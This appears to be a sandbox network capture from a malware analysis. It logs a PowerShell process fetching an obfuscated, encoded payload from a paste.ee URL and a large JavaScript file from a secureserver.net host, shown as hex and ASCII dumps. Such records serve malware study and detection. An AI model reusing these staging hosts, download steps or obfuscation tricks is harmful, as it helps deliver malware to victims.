2025-01-05 07:31:59 UTC	1369	IN	Data Raw: 9f f0 9f 8e a5 e2 9b 8f f0 9f 8d 83 f0 9f 92 a2 e2 9b 81 f0 9f 8d 8a e2 9a 8a f0 9f 91 bd 6b 53 32 39 6b 63 47 5a 4c 64 47 39 6b 59 31 70 51 56 32 74 72 56 55 78 48 56 31 55 75 55 33 56 69 63 33 52 79 61 57 35 6e 4b 43 52 30 65 46 64 58 56 57 56 42 56 57 31 6c 63 45 64 48 62 32 46 58 56 57 56 44 51 69 77 67 4a 46 56 76 61 57 6c 73 53 30 70 6b 55 6b 46 4f 54 47 39 51 63 47 35 31 59 30 74 6a 4b 54 73 6b 54 30 39 70 55 47 78 74 54 30 64 58 59 30 78 77 54 30 4a 4f 51 32 6c 58 5a 46 49 67 50 53 f0 9f 98 84 f0 9f 8e b3 e2 98 8f f0 9f 99 8b e2 9a a2 e2 9a ba f0 9f 96 9f f0 9f 8e a5 e2 9b 8f f0 9f 8d 83 f0 9f 92 a2 e2 9b 81 f0 9f 8d 8a e2 9a 8a f0 9f 91 bd 74 61 6d 39 70 62 69 f0 9f 98 84 f0 9f 8e b3 e2 98 8f f0 9f 99 8b e2 9a a2 e2 9a ba f0 9f 96 9f f0 9f 8e a5 Data Ascii: kS29kcGZLdG9kY1pQV2trVUxHV1UuU3Vic3RyaW5nKCR0eFdXVWVBVW1lcEdHb2FXVWVDQiwgJFVvaWlsS0pkUkFOTG9QcG51Y0tjKTskT09pUGxtT0dXY0xwT0JOQ2lXZFIgPStam9pbi
2025-01-05 07:31:59 UTC	1098	IN	Data Raw: 63 73 4a 32 68 77 61 55 4e 70 56 31 52 44 54 6d 39 77 61 58 70 31 56 32 46 48 65 6b 4e 30 4a 79 77 6e 56 47 46 7a 61 30 35 68 62 57 55 6e 4b 53 6b 37 61 57 59 67 4b 43 52 75 64 57 78 73 49 43 31 75 5a 53 f0 9f 98 84 f0 9f 8e b3 e2 98 8f f0 9f 99 8b e2 9a a2 e2 9a ba f0 9f 96 9f f0 9f 8e a5 e2 9b 8f f0 9f 8d 83 f0 9f 92 a2 e2 9b 81 f0 9f 8d 8a e2 9a 8a f0 9f 91 bd 6b 55 46 4e 57 5a 58 4a 7a 61 57 39 75 56 47 46 69 62 47 55 67 4c 57 46 75 5a 43 f0 9f 98 84 f0 9f 8e b3 e2 98 8f f0 9f 99 8b e2 9a a2 e2 9a ba f0 9f 96 9f f0 9f 8e a5 e2 9b 8f f0 9f 8d 83 f0 9f 92 a2 e2 9b 81 f0 9f 8d 8a e2 9a 8a f0 9f 91 bd 6b 55 46 4e 57 5a 58 4a 7a 61 57 39 75 56 47 46 69 62 47 55 75 55 46 4e 57 5a 58 4a 7a 61 57 39 75 49 43 31 75 5a 53 f0 9f 98 84 f0 9f 8e b3 e2 98 8f f0 9f Data Ascii: csJ2hwaUNpV1RDTm9waXp1V2FHekN0JywnVGFza05hbWUnKSk7aWYgKCRudWxsIC1uZSkUFNWZXJzaW9uVGFibGUgLWFuZCkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZS
2025-01-05 07:31:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	188.114.96.3	443	7356	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 07:32:21 UTC	67	OUT	GET /d/5VcuL/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
2025-01-05 07:32:21 UTC	1238	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 07:32:21 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K1oqQQxMP4GcnNjkg6t7e9LyuajMj25umdKokzWKv0j908gGhm77MseXZzAv8o33i9wLWYFgivT%2F0%2FTFFOC48eN0U%2BPdbR7uc7oB%2BJ9f%2FOk7ukIH%2FvQv5L9UMg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd1c6222bfe72a4-EWR alt-svc: h3=":443"; ma=86400
2025-01-05 07:32:21 UTC	215	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 32 30 37 37 26 6d 69 6e 5f 72 74 74 3d 32 30 37 34 26 72 74 74 5f 76 61 72 3d 37 38 34 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 33 39 30 34 37 36 26 63 77 6e 64 3d 32 31 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 63 35 31 62 62 30 64 65 65 34 35 38 62 36 64 66 26 74 73 3d 34 38 30 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=2077&min_rtt=2074&rtt_var=784&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1390476&cwnd=212&unsent_bytes=0&cid=c51bb0dee458b6df&ts=480&x=0"
2025-01-05 07:32:21 UTC	1285	IN	Data Raw: 31 66 37 66 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 34 7a 44 32 38 77 4c 50 63 79 44 66 38 67 46 50 4d 78 44 4c 38 41 77 4f 6b 76 44 78 37 51 36 4f 41 75 44 59 37 77 7a 4f 63 6f 44 38 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a Data Ascii: 1f7fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP4zD28wLPcyDf8gFPMxDL8AwOkvDx7Q6OAuDY7wzOcoD86wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNz
2025-01-05 07:32:21 UTC	1369	IN	Data Raw: 56 33 41 31 4e 4d 64 44 50 33 67 7a 4e 6f 63 44 45 33 67 77 4e 45 63 44 41 32 77 76 4e 73 62 44 36 32 67 74 4e 41 62 44 75 32 51 72 4e 77 61 44 6f 32 77 70 4e 4d 61 44 64 32 77 6d 4e 6f 5a 44 57 32 51 6c 4e 45 5a 44 4c 32 51 69 4e 67 59 44 45 32 77 51 4e 30 58 44 38 31 77 65 4e 6f 58 44 6b 31 67 59 4e 45 43 41 41 42 51 47 41 47 41 4d 41 41 41 77 4f 6f 74 44 5a 77 41 44 41 41 41 41 45 41 59 41 73 41 73 44 4d 37 67 69 4f 55 72 44 30 36 77 73 4f 59 71 44 65 36 77 6c 4f 38 6f 44 4f 36 67 69 4f 51 6b 44 32 35 67 63 4f 73 6d 44 71 35 67 59 4f 45 6d 44 67 35 77 48 41 41 41 41 4d 41 59 41 67 41 67 44 67 34 77 48 4f 41 63 44 2f 33 67 2f 4e 73 66 44 36 33 51 2b 4e 67 66 44 33 33 67 39 4e 55 66 44 30 33 77 38 4e 49 66 44 78 33 41 38 4e 38 65 44 75 33 51 37 4e 77 65 Data Ascii: V3A1NMdDP3gzNocDE3gwNEcDA2wvNsbD62gtNAbDu2QrNwaDo2wpNMaDd2wmNoZDW2QlNEZDL2QiNgYDE2wQN0XD81weNoXDk1gYNECAABQGAGAMAAAwOotDZwADAAAAEAYAsAsDM7giOUrD06wsOYqDe6wlO8oDO6giOQkD25gcOsmDq5gYOEmDg5wHAAAAMAYAgAgDg4wHOAcD/3g/NsfD63Q+NgfD33g9NUfD03w8NIfDx3A8N8eDu3Q7Nwe
2025-01-05 07:32:21 UTC	1369	IN	Data Raw: 36 51 69 4f 63 6f 44 46 36 77 67 4f 45 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44 44 35 51 41 4f 38 6a 44 39 34 77 4f 4f 6b 6a 44 33 34 51 4e 4f 4d 6a 44 78 34 77 4c 4f 30 69 44 72 34 51 4b 4f 63 69 44 6c 34 77 49 4f 45 69 44 66 34 51 48 4f 73 68 44 5a 34 77 46 4f 55 68 44 54 34 51 45 4f 38 67 44 4e 34 77 43 4f 6b 67 44 48 34 51 42 4f 4d 67 44 42 33 77 2f 4e 30 66 44 37 33 51 2b 4e 63 66 44 31 33 77 38 4e 73 64 44 5a 33 77 31 4e 55 64 44 54 33 51 30 4e 38 63 44 4e 33 77 79 4e 6b 63 44 48 33 51 78 4e 4d 63 44 42 32 77 76 4e 30 62 44 37 32 51 75 4e 63 62 44 Data Ascii: 6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8NsdDZ3w1NUdDT3Q0N8cDN3wyNkcDH3QxNMcDB2wvN0bD72QuNcbD
2025-01-05 07:32:21 UTC	1369	IN	Data Raw: 67 55 4e 41 56 44 4f 31 41 54 4e 6f 55 44 49 31 67 52 4e 51 55 44 43 31 41 41 4e 34 54 44 38 30 67 4f 4e 67 54 44 32 30 41 4e 4e 49 54 44 77 30 67 4c 4e 77 53 44 71 30 41 4b 4e 59 53 44 6b 30 67 49 4e 41 53 44 65 30 41 48 4e 6f 52 44 59 30 67 46 4e 51 52 44 53 30 41 45 4e 34 51 44 4d 30 67 43 4e 67 51 44 47 30 41 42 4e 49 51 44 41 7a 67 2f 4d 77 50 44 36 7a 41 2b 4d 59 50 44 30 7a 67 38 4d 41 50 44 75 7a 41 37 4d 6f 4f 44 6f 7a 67 35 4d 51 4f 44 69 7a 41 34 4d 34 4e 44 63 7a 67 32 4d 67 4e 44 57 7a 41 31 4d 49 4e 44 51 7a 67 7a 4d 77 4d 44 4b 7a 41 79 4d 59 4d 44 45 7a 67 77 4d 41 49 44 2b 79 41 76 4d 6f 4c 44 34 79 67 74 4d 51 4c 44 79 79 41 73 4d 34 4b 44 73 79 67 71 4d 67 4b 44 6d 79 41 70 4d 49 4b 44 67 79 67 6e 4d 77 4a 44 61 79 41 6d 4d 59 4a 44 55 Data Ascii: gUNAVDO1ATNoUDI1gRNQUDC1AAN4TD80gONgTD20ANNITDw0gLNwSDq0AKNYSDk0gINASDe0AHNoRDY0gFNQRDS0AEN4QDM0gCNgQDG0ABNIQDAzg/MwPD6zA+MYPD0zg8MAPDuzA7MoODozg5MQODizA4M4NDczg2MgNDWzA1MINDQzgzMwMDKzAyMYMDEzgwMAID+yAvMoLD4ygtMQLDyyAsM4KDsygqMgKDmyApMIKDgygnMwJDayAmMYJDU
2025-01-05 07:32:21 UTC	1369	IN	Data Raw: 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 51 45 4f 41 68 44 50 34 67 44 4f 30 67 44 4d 34 77 43 4f 6f 67 44 4a 34 41 43 4f 63 67 44 47 34 51 42 4f 51 67 44 41 33 77 2f 4e 34 66 44 39 33 41 2f 4e 73 66 44 36 33 51 2b 4e 67 66 44 33 33 67 39 4e 55 66 44 77 33 77 37 4e 34 65 44 74 33 41 37 4e 73 65 44 71 33 51 36 4e 67 65 44 6e 33 67 35 4e 55 65 44 6b 33 77 34 4e 49 65 44 68 33 41 34 4e 38 64 44 65 33 51 33 4e 77 64 44 62 33 67 32 4e 6b 64 44 59 33 77 31 4e 59 64 44 50 33 67 7a 4e 30 63 44 49 33 77 78 4e 59 63 44 46 33 Data Ascii: cOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4QEOAhDP4gDO0gDM4wCOogDJ4ACOcgDG4QBOQgDA3w/N4fD93A/NsfD63Q+NgfD33g9NUfDw3w7N4eDt3A7NseDq3Q6NgeDn3g5NUeDk3w4NIeDh3A4N8dDe3Q3NwdDb3g2NkdDY3w1NYdDP3gzN0cDI3wxNYcDF3
2025-01-05 07:32:21 UTC	1310	IN	Data Raw: 4f 4e 67 54 4f 31 38 45 4e 31 54 44 68 7a 30 35 4d 38 4e 44 42 79 4d 75 4d 4e 4c 44 6c 79 34 53 4d 2f 48 54 31 78 77 47 4d 55 43 7a 52 41 41 41 41 51 42 51 42 41 41 77 50 4e 2f 7a 75 2f 49 6a 50 73 33 7a 34 36 59 69 4f 65 6f 6a 46 36 34 67 4f 48 67 6a 51 34 59 77 4e 30 66 6a 34 33 41 39 4e 2b 65 54 43 30 41 79 4d 68 50 7a 7a 7a 30 37 4d 72 4f 54 6d 7a 63 34 4d 31 4e 7a 59 7a 45 31 4d 2f 4d 54 4c 7a 73 78 4d 4a 49 54 78 79 45 72 4d 68 4a 6a 57 79 38 68 4d 4a 45 7a 31 78 73 63 4d 63 47 7a 6a 78 45 56 4d 77 45 6a 4a 78 4d 42 4d 70 44 44 34 77 6b 4e 4d 58 43 44 6b 77 59 46 4d 41 42 54 4b 77 49 43 41 41 41 41 64 41 51 41 38 41 38 54 2b 2f 45 2f 50 55 2f 6a 78 2f 63 37 50 33 39 54 58 39 55 55 50 58 77 6a 36 38 67 4e 50 41 7a 7a 74 38 6f 7a 4f 7a 74 44 58 37 38 Data Ascii: ONgTO18EN1TDhz05M8NDByMuMNLDly4SM/HT1xwGMUCzRAAAAQBQBAAwPN/zu/IjPs3z46YiOeojF64gOHgjQ4YwN0fj43A9N+eTC0AyMhPzzz07MrOTmzc4M1NzYzE1M/MTLzsxMJITxyErMhJjWy8hMJEz1xscMcGzjxEVMwEjJxMBMpDD4wkNMXCDkwYFMABTKwICAAAAdAQA8A8T+/E/PU/jx/c7P39TX9UUPXwj68gNPAzzt8ozOztDX78
2025-01-05 07:32:21 UTC	1369	IN	Data Raw: 32 30 30 30 0d 0a 57 33 4d 6c 4e 70 51 54 4c 7a 30 31 4d 2b 4d 44 48 79 34 71 4d 4d 4b 44 66 79 63 6d 4d 64 46 44 76 78 63 61 4d 65 47 54 6b 78 59 59 4d 77 45 44 4b 78 4d 41 4d 37 44 54 7a 77 59 4d 4d 31 43 7a 71 77 45 4b 4d 61 43 7a 69 77 55 49 4d 2b 42 7a 63 41 41 41 41 30 42 41 42 41 43 67 50 33 37 44 37 2b 77 6f 50 30 34 6a 4c 2b 67 69 50 56 34 7a 42 39 38 66 50 6f 33 6a 33 39 4d 64 50 4e 33 44 79 39 4d 61 50 61 32 6a 64 39 34 57 50 76 30 7a 4a 38 59 4f 50 62 7a 44 69 38 49 49 50 62 77 7a 45 38 55 77 4f 39 76 44 39 37 73 2b 4f 6a 76 7a 32 37 4d 39 4f 49 76 6a 74 37 34 36 4f 69 75 6a 6d 37 45 35 4f 49 75 44 67 37 67 33 4f 77 74 44 61 37 73 31 4f 50 74 7a 52 37 6b 67 4f 64 72 54 73 36 6f 6f 4f 45 71 6a 66 36 67 6e 4f 77 70 44 62 36 45 6d 4f 53 70 6a 52 Data Ascii: 2000W3MlNpQTLz01M+MDHy4qMMKDfycmMdFDvxcaMeGTkxYYMwEDKxMAM7DTzwYMM1CzqwEKMaCziwUIM+BzcAAAA0BABACgP37D7+woP04jL+giPV4zB98fPo3j39MdPN3Dy9MaPa2jd94WPv0zJ8YOPbzDi8IIPbwzE8UwO9vD97s+Ojvz27M9OIvjt746Oiujm7E5OIuDg7g3OwtDa7s1OPtzR7kgOdrTs6ooOEqjf6gnOwpDb6EmOSpjR
2025-01-05 07:32:21 UTC	1369	IN	Data Raw: 4c 4e 6a 53 54 6a 30 34 48 4e 4f 52 6a 4d 30 38 78 4d 34 50 6a 34 79 34 71 4d 39 4a 6a 63 79 63 6c 4d 7a 49 7a 46 79 55 41 4d 66 44 54 77 77 4d 4b 4d 65 42 41 41 41 41 4c 41 45 41 43 41 41 41 77 50 30 39 7a 5a 2f 63 31 50 4b 35 6a 6b 2b 49 6c 50 41 35 7a 4d 2b 67 69 50 45 30 44 31 39 63 63 50 74 32 6a 51 39 49 77 4f 66 74 6a 53 35 30 45 4f 73 6a 6a 59 34 67 42 4f 44 63 54 71 33 59 6c 4e 4a 56 7a 61 31 67 55 4e 59 51 7a 42 41 41 41 41 45 42 41 42 51 41 41 41 41 67 7a 38 31 55 61 4e 49 57 6a 4e 30 41 39 4d 34 4b 7a 2b 79 49 73 4d 63 4b 44 59 78 4d 49 4d 52 43 44 59 41 41 41 41 6b 41 41 42 41 41 77 50 43 2f 54 66 2f 6f 6b 50 34 37 7a 79 2b 34 5a 50 73 33 7a 4e 39 63 77 4f 32 75 7a 62 37 51 78 4f 47 67 6a 7a 34 49 67 4e 74 4e 54 32 7a 6b 30 4d 6a 4d 6a 42 79 Data Ascii: LNjSTj04HNORjM08xM4Pj4y4qM9JjcyclMzIzFyUAMfDTwwMKMeBAAAALAEACAAAwP09zZ/c1PK5jk+IlPA5zM+giPE0D19ccPt2jQ9IwOftjS50EOsjjY4gBODcTq3YlNJVza1gUNYQzBAAAAEBABQAAAAgz81UaNIWjN0A9M4Kz+yIsMcKDYxMIMRCDYAAAAkAABAAwPC/Tf/okP47zy+4ZPs3zN9cwO2uzb7QxOGgjz4IgNtNT2zk0MjMjBy
2025-01-05 07:32:21 UTC	1369	IN	Data Raw: 4d 6c 41 6a 2f 77 67 4f 4d 69 44 44 31 77 38 4d 4d 4a 44 7a 77 77 30 4c 4d 34 43 6a 73 77 77 4b 4d 6d 43 54 6f 77 73 4a 4d 56 43 7a 6a 77 6f 49 4d 45 43 6a 66 77 67 48 4d 7a 42 54 62 77 63 47 4d 68 42 44 58 77 59 46 4d 51 42 6a 53 77 55 45 4d 2f 41 54 4f 77 4d 44 4d 75 41 44 4b 77 49 43 4d 63 41 7a 46 77 45 42 4d 4c 41 54 42 77 41 41 41 41 41 41 33 41 4d 41 55 41 38 6a 2b 2f 51 2f 50 75 2f 54 36 2f 4d 2b 50 64 2f 7a 31 2f 49 39 50 4d 2f 6a 78 2f 41 38 50 37 2b 54 74 2f 38 36 50 70 2b 44 70 2f 34 35 50 59 2b 6a 6b 2f 30 34 50 48 2b 54 67 2f 73 33 50 32 39 44 63 2f 6f 32 50 6b 39 7a 58 2f 6b 31 50 54 39 54 54 2f 67 30 50 43 39 44 50 2f 59 7a 50 78 38 7a 4b 2f 55 79 50 66 38 6a 47 2f 51 78 50 4f 38 44 43 2f 4d 67 50 39 37 7a 39 2b 45 76 50 73 37 6a 35 2b 41 Data Ascii: MlAj/wgOMiDD1w8MMJDzww0LM4CjswwKMmCTowsJMVCzjwoIMECjfwgHMzBTbwcGMhBDXwYFMQBjSwUEM/ATOwMDMuADKwICMcAzFwEBMLATBwAAAAAA3AMAUA8j+/Q/Pu/T6/M+Pd/z1/I9PM/jx/A8P7+Tt/86Pp+Dp/45PY+jk/04PH+Tg/s3P29Dc/o2Pk9zX/k1PT9TT/g0PC9DP/YzPx8zK/UyPf8jG/QxPO8DC/MgP97z9+EvPs7j5+A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	160.153.175.102	443	7796	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 07:32:23 UTC	189	OUT	GET /file.js HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 102.175.153.160.host.secureserver.net Connection: Keep-Alive
2025-01-05 07:32:23 UTC	382	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 05 Jan 2025 07:32:23 GMT Content-Type: application/javascript Content-Length: 168267 Last-Modified: Thu, 02 Jan 2025 15:44:10 GMT Connection: close Vary: Accept-Encoding ETag: "6776b44a-2914b" Expires: Sun, 05 Jan 2025 19:32:23 GMT Cache-Control: max-age=43200 Strict-Transport-Security: max-age=31536000 Accept-Ranges: bytes
2025-01-05 07:32:23 UTC	16002	IN	Data Raw: 0d 0a 76 61 72 20 62 61 73 6b 65 74 63 61 73 65 73 20 3d 20 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 32 30 30 33 2f 30 38 2f 70 72 69 6e 74 69 6e 67 2f 70 72 69 6e 74 73 63 68 65 6d 61 6b 65 79 77 6f 72 64 73 22 3b 0d 0a 76 61 72 20 70 79 72 72 79 20 3d 20 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 32 30 31 33 2f 30 35 2f 70 72 69 6e 74 69 6e 67 2f 70 72 69 6e 74 73 63 68 65 6d 61 6b 65 79 77 6f 72 64 73 76 31 31 22 3b 0d 0a 76 61 72 20 61 6c 65 62 65 6e 63 68 20 3d 20 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 32 30 31 33 2f 31 32 2f 70 72 69 Data Ascii: var basketcases = "http://schemas.microsoft.com/windows/2003/08/printing/printschemakeywords";var pyrry = "http://schemas.microsoft.com/windows/2013/05/printing/printschemakeywordsv11";var alebench = "http://schemas.microsoft.com/windows/2013/12/pri
2025-01-05 07:32:23 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 28 74 68 69 73 2e 73 74 72 65 61 6d 2e 67 65 74 28 63 6f 6e 74 65 6e 74 29 20 3d 3d 3d 20 30 29 20 3f 20 22 66 61 6c 73 65 22 20 3a 20 22 74 72 75 65 22 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 30 78 30 32 3a 20 2f 2f 20 49 4e 54 45 47 45 52 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 2e 73 74 72 65 61 6d 2e 70 61 72 73 65 49 6e 74 65 67 65 72 28 63 6f 6e 74 65 6e 74 2c 20 63 6f 6e 74 65 6e 74 20 2b 20 6c 65 6e 2c 20 6d 61 78 4c 65 6e 67 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 30 78 30 33 3a 20 2f 2f 20 42 49 54 5f 53 54 52 49 4e 47 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 2e 73 Data Ascii: return (this.stream.get(content) === 0) ? "false" : "true"; case 0x02: // INTEGER return this.stream.parseInteger(content, content + len, maxLength); case 0x03: // BIT_STRING return this.s
2025-01-05 07:32:23 UTC	16384	IN	Data Raw: 69 63 5b 27 32 32 34 38 27 5d 20 3d 20 27 46 37 27 3b 0d 0a 20 20 20 20 20 20 20 20 63 61 72 6f 6c 79 74 69 63 5b 27 42 30 27 5d 20 3d 20 27 46 38 27 3b 0d 0a 20 20 20 20 20 20 20 20 63 61 72 6f 6c 79 74 69 63 5b 27 32 32 31 39 27 5d 20 3d 20 27 46 39 27 3b 0d 0a 20 20 20 20 20 20 20 20 63 61 72 6f 6c 79 74 69 63 5b 27 42 37 27 5d 20 3d 20 27 46 41 27 3b 0d 0a 20 20 20 20 20 20 20 20 63 61 72 6f 6c 79 74 69 63 5b 27 32 32 31 41 27 5d 20 3d 20 27 46 42 27 3b 0d 0a 20 20 20 20 20 20 20 20 63 61 72 6f 6c 79 74 69 63 5b 27 32 30 37 46 27 5d 20 3d 20 27 46 43 27 3b 0d 0a 20 20 20 20 20 20 20 20 63 61 72 6f 6c 79 74 69 63 5b 27 42 32 27 5d 20 3d 20 27 46 44 27 3b 0d 0a 20 20 20 20 20 20 20 20 63 61 72 6f 6c 79 74 69 63 5b 27 32 35 41 30 27 5d 20 3d 20 27 46 45 Data Ascii: ic['2248'] = 'F7'; carolytic['B0'] = 'F8'; carolytic['2219'] = 'F9'; carolytic['B7'] = 'FA'; carolytic['221A'] = 'FB'; carolytic['207F'] = 'FC'; carolytic['B2'] = 'FD'; carolytic['25A0'] = 'FE
2025-01-05 07:32:23 UTC	16384	IN	Data Raw: 43 6f 64 65 20 3d 20 30 3b 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 22 22 3b 0d 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 73 69 7a 65 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 73 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 62 79 74 65 43 6f 64 65 29 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 73 3b 0d 0a 7d 3b 0d 0a 0d 0a 53 74 72 69 6e 67 2e 66 72 6f 6d 48 65 78 20 3d 20 66 75 6e 63 74 69 6f 6e 28 73 29 20 7b 0d 0a 20 20 20 20 69 66 20 28 74 79 70 65 6f 66 20 73 20 21 3d 20 27 73 74 72 69 6e 67 27 29 20 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 45 78 70 65 63 74 65 64 20 27 73 74 72 69 6e 67 27 20 74 79 70 65 20 61 6e 64 20 6e 6f 74 20 22 20 2b 20 28 74 Data Ascii: Code = 0; var s = ""; for (var i = 0; i < size; i++) { s += String.fromCharCode(byteCode); } return s;};String.fromHex = function(s) { if (typeof s != 'string') throw new Error("Expected 'string' type and not " + (t
2025-01-05 07:32:23 UTC	16384	IN	Data Raw: 20 20 20 74 68 69 73 2e 73 74 61 74 65 6d 65 6e 74 20 3d 20 27 27 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 72 75 65 3b 0d 0a 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 65 78 65 63 75 74 65 3a 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 74 68 69 73 2e 73 74 65 70 53 74 61 74 65 6d 65 6e 74 28 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 74 68 69 73 2e 77 61 72 6e 28 65 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 20 66 69 6e 61 6c 6c 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 74 68 69 73 2e 63 6c 6f 73 65 28 29 3b 0d 0a 20 20 20 20 Data Ascii: this.statement = ''; } return true; }, execute: function() { try { while (this.stepStatement()); } catch (e) { this.warn(e); } finally { this.close();
